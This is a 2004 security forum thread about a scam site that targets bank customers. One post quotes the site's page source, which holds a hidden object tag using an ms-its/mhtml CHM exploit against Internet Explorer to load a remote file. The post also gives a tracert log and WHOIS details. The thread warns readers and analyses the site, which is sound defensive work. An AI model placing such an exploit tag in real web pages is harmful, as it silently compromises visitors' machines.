Jump to content


New Scam Targets Bank Customers - ISC notes...

  • Please log in to reply
1 reply to this topic

#1 AplusWebMaster



  • SWI Friend
  • PipPipPipPipPip
  • 10,496 posts

Posted 29 June 2004 - 03:03 PM


- http://isc.sans.org/...date=2004-06-29
Updated June 29th 2004 18:17 UTC
"...On June 24th, a visitor to the SANS Internet Storm Center reported that his company was "...in the middle of a very disturbing ... issue regarding the adware/spyware/IE exploit genre..." He requested help analyzing an "encrypted or compressed" file that had been downloaded to a machine at their site. Tom Liston, one of our volunteer handlers, spent the weekend analyzing this issue. His findings are summarized here...A complete write-up of Tom's findings is available online at
- http://isc.sans.org/...ing_malware.pdf ..."


.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...

#2 Tuxedo Jack

Tuxedo Jack

    Creator of TuxPE, a Cat5-o'-9-Tails, Etherkillers, and more

  • Expert
  • PipPipPipPipPip
  • 1,757 posts

Posted 29 June 2004 - 04:12 PM

The site, refestltd.com (DO NOT GO THERE IF YOU'RE RUNNING IE), has an ad for SpyHunter along with an affiliate link on the front page.

This bumps SpyHunter up into the ranks of CWS in my view. It remains to be seen whether SpyHunter will take action against this affiliate, but personally, I hope the people behind this are dragged out into the street and beaten with SCSI cables.

And yes, I know the image quality is bad. I had to copy/paste into _Paint_ because I'm on my work laptop and I don't have anything better on it.


I opened up the source, and what do you know, look what was in it! (DON'T CLICK THE LINKS!)

<!--  TRTRTRTRTR    -->
  <div style.none>

        <object type='text/x-scriptlet' data='ms-its:mhtml:file://c:\sdfs.mht!http://www.refestltd...l.chm::/idx.htm' style='visibility:hidden'>
<!--  TRTRTRTRTR    -->

The little rats are trying to exploit the .chm vulnerability in IE! This is plain out-and-out criminal!

I'm doing a tracert as we speak. Methinks this is going to end up in Russia.


<later edit>

According to two different tracert logs, this site's hosted in San Diego by AplusNet. I would suggest that someone mirror the site's contents before the authorities yank it - I'm going to get what I can and investigate these rats.

Here's the tracert log, as performed from a server in the Netherlands:

1  ofc.br05.m3x.support.nl ( [AS8582]  1 ms  1 ms  1 ms
2  ar09.m3x.support.nl ( [AS8582]  1 ms  1 ms  1 ms
3  br07.m3x.support.nl ( [AS8582]  1 ms  1 ms  1 ms
4  lvl3gw.ams1.packetexchange.net ( [AS9057/AS3356]  2 ms  3 ms  2 ms
5  ae-0-55.mp1.Amsterdam1.Level3.net ( [AS9057/AS3356]  3 ms  10 ms  8 ms
6  so-3-0-0.mp1.London2.Level3.net ( [AS9057/AS3356]  11 ms  11 ms  12 ms
7  as-0-0.bbr2.Washington1.Level3.net ( [AS3356]  83 ms  85 ms  85 ms
8  so-0-1-0.mp1.SanDiego1.Level3.net ( [AS3356]  144 ms  146 ms  144 ms
9  so-8-0.hsa1.SanDiego1.Level3.net ( [AS3356]  144 ms  144 ms  147 ms
10  Aplus-gw.Level3.net ( [AS3356]  145 ms  145 ms  144 ms
11  core01.san-diego.abac.net ( [AS10316]  256 ms  146 ms  144 ms
12  pro10.abac.com ( [AS10316]  145 ms  144 ms  145 ms

The host's IP address is genuine; it appears to be

The WHOIS information is obviously falsified.

Domain name: refestltd.com

  Jay Seaton (6PPPG) jay@tremjade.com
  NA,    NA    00000
  United States
  Phone: (913)6814254 x

Administrative Contact:
  Jay Seaton (F6DUK) jay@tremjade.com
  NA,    NA    00000
  United States
  Phone: (913)6814254 x

Technical Contact:
  Jay Seaton (6PPPG) jay@tremjade.com
  NA,    NA    00000
  United States
  Phone: (913)6814254 x

Billing Contact:
  Jay Seaton (7JN5G) jay@tremjade.com
  NA,    NA    00000
  United States
  Phone: (913)6814254 x

Record last updated on 2004-04-22 00:00:00
Record created on 2004-04-22 00:00:00
Record expires on 2005-04-22 00:00:00

Domain servers in listed order:

Registration Service Provider: AplusNet(APRO)

Registrar: NAMES4EVER, http://www.names4ever.com

    The previous information has been obtained either directly from the registrant or a registrar of the domain name other than Network Solutions. Network Solutions, therefore, does not guarantee its accuracy or completeness.

That's what I've got for now. Further bulletins as events warrant.

</later edit>

Attached Thumbnails

  • spyhunter_thieves.JPG

Edited by Tuxedo Jack, 29 June 2004 - 04:23 PM.

Signature file is under revision. This will be back shortly.

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

Member of ASAP and UNITE
Support SpywareInfo Forum - click the button